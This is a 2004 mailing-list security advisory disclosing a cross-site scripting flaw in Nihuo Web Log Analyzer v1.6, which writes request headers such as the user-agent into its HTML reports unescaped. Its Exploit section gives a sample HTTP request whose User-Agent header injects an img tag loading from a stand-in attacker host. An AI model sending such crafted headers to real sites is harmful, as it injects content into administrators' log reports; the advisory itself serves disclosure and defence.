Cross-Site Scripting (XSS) in Nihuo Web Log Analyzer

From: Audun Larsen (larsen_at_xqus.com)
Date: 08/20/04

  • Next message: joe: "RE: Re[2]: [Full-Disclosure] Security aspects of time synchronization infrastructure"
    Date: 20 Aug 2004 19:25:29 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    ---------------------------------------------------------------------------
              Cross-Site Scripting (XSS) in Nihuo Web Log Analyzer
    ---------------------------------------------------------------------------
    Author: Audun Larsen (larsen at xqus dot com)
    Date: Aug 20, 2004

    Affected software:
    ==================
    Name: Nihuo Web Log Analyzer
    URL: http://www.loganalyzer.net/index.html
    Version: v1.6 (older versions not tested)
    Released: Feb 17, 2004

    Vendors description:
    ====================
    Nihuo Web Log Analyzer can generate a wide range of reports and statistics from your log file - more than 80 different reports with 2D and 3D graphs.

    Introduction:
    =============
    Most developers know that input validation is important. If you look at the history of PHP-nuke you can see that software that does not check the user
    input thoroughly, is insecure.

    Discussion:
    ===========
    Many think that http access-log analyzers don't get any input from the user.
    But think about it, both the user-agent and the referer header is data that can be manipulated by the user.
    Nihuo Web Log Analyzer is vulnerable to just this type of attack.

    Exploit:
    ========
    To exploit Nihuo Web Log Analyzer we have to send a special HTTP request that includes malicious code.

    GET / HTTP/1.1
    Host: sample.com
    Connection: close
    Accept: text/plain
    Accept-Language: en-us,en
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    User-Agent: Some-Fake-UA <img src='http://attacker.host.com/app.gif'>

    Generating this HTTP request can easily be done in Perl, PHP or any other language. Generating enough hits with this user-agent will cause the user-agent to appear in the "Top Browsers" list, with the HTML code
    included. Notice that single quotes is used in the User-Agent.

    Tested with:
    ============
    Apache 1.3.x
    Nihuo Web Log Analyzer v1.6 (Running on Win2k)

    Solution:
    =========
    No solution available at the time writing.
    Vendor notified Aug 20, 2004.

    Disclaimer:
    ===========
    The information in this advisory and any of its demonstrations is provided "as is" without warranty of any kind.

    Copyright 2004 Audun Larsen


  • Next message: joe: "RE: Re[2]: [Full-Disclosure] Security aspects of time synchronization infrastructure"